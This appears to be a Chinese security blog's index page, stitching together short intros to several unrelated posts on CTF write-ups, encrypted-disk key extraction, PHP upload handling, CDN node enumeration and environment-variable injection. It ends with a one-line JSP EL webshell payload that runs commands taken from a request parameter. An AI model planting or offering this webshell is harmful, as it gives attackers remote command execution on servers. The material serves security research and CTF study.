前言

这次WMCTF拿了3个一血
题目设计非常有趣 其中还有几个0day 很多实际渗透遇到的问题也考虑到了

作者:橙子酱

前言

之前的文章中提到了一种有启动分区的情况
磁盘主引导->引导分区->引导内核->系统启动->解密挂载分区 (一个引导分区 +一个主分区)
遇到这种情况就可以通过简单的提取文件系统中的秘钥解决.
但是运气不好还会遇到两种更变态的情况

测试环境 PHP 7.1.9

php文件上传处理在 main/rfc1867.c 中的 rfc1867_post_handler函数

前言

前不久我遇到了一个关于获取CDN节点ip列表的问题:
如何快速获取一家CDN节点在全国的范围内的节点ip？

为了解决这个问题，我分析了智能DNS的工作原理。根据原理，我写出了一个使用 Edns-Client-Subnet(ECS) 伪造客户端ip用于遍历cdn节点ip的小工具。

author:白帽酱
题目给了后端源码 一道题利用了前不久出现的一个鸡肋洞 openssl c_rehash(CVE-2022-1292) 题目还是比较有意思的

前言

前不久p牛分享了一个利用环境变量注入劫持bash的技巧.
当时我就在想这种环境变量的注入有没有什么比较通用的场景。一般遇到的环境变量注入基本上都是直接使用ld_preload解决问题。p牛的这种新的环境变量注入的利用技巧，有没有什么特殊的利用面呢。

jsp中可以使用el表达式
所以我们可以使用和el表达式注入一样的方法构造webshell

可以避免出现 <%符号

${Runtime.getRuntime().exec(param.a)}